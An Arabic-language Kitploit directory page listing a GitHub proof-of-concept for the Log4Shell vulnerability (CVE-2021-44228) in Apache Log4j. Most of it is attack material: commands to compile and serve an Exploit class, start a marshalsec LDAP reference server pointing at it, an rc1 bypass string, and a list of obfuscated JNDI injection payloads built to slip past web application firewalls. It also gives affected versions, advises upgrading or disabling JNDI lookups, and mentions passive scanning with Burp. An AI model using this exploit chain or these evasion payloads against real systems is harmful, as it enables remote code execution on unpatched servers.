Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-Apache-Log4j-Rce — استغلال لإثبات المفهوم لـ CVE-2021-44228 (Log4Shell) مع حمولات حقن JNDI، وتقنيات تجاوز جدار الحماية (WAF)، وتكامل المسح السلبي لـ Burp Suite. | Kitploit
أدوات/GitHubGitHub/kannthu/cve-2021-44228-apache-log4j-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقتطوير الحمولات
GitHubkannthu/cve-2021-44228-apache-log4j-rce

CVE-2021-44228-Apache-Log4j-Rce

استغلال لإثبات المفهوم لـ CVE-2021-44228 (Log4Shell) مع حمولات حقن JNDI، وتقنيات تجاوز جدار الحماية (WAF)، وتكامل المسح السلبي لـ Burp Suite.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 4 سنواتلم تتم المراجعة بعد

CVE-2021-44228 (تنفيذ التعليمات البرمجية عن بُعد في Apache Log4j)

جميع إصدارات log4j-core >=2.0-beta9 و <=2.14.1

إصدارات 1.x تحتوي على ثغرات أخرى، نوصي بتحديثها إلى أحدث إصدار.

إعلانات / نشرات أمنية مرتبطة بـ Log4Shell (CVE-2021-44228)

الاستخدام:

root@kitploit:~
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
# For Python2
python -m SimpleHTTPServer 8888 
# For Python3
python3 -m http.server 8888
root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

شغّل المشروع أخيرًا، وسترى الآلة الحاسبة الخاصة بك على جهازك المحلي.

نصائح:

لا تعتمد على إصدار Java الحالي لإنقاذك. قم بتحديث Log4j (أو إزالة البحث عن JNDI). قم بتعطيل التوسع (يبدو فكرة سيئة على أي حال).

تجاوز rc1

على سبيل المثال:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

تجاوز WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

لا تثق بجدار الحماية لتطبيقات الويب.

تفاصيل الثغرة

توفر عمليات البحث (Lookups) طريقة لإضافة قيم إلى تكوين Log4j في أماكن عشوائية.

Lookups

الطرق المسببة للتسرب في finally

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

طريقة الفحص البسيطة

إذا كنت ترغب في إجراء اختبار الصندوق الأسود، أقترح عليك القيام بالمسح السلبي.

BurpLog4jScan

استمتع!!! BurpLog4jScan.png

عدد النجوم عبر الزمن

Stargazers over time

تنزيل الأداة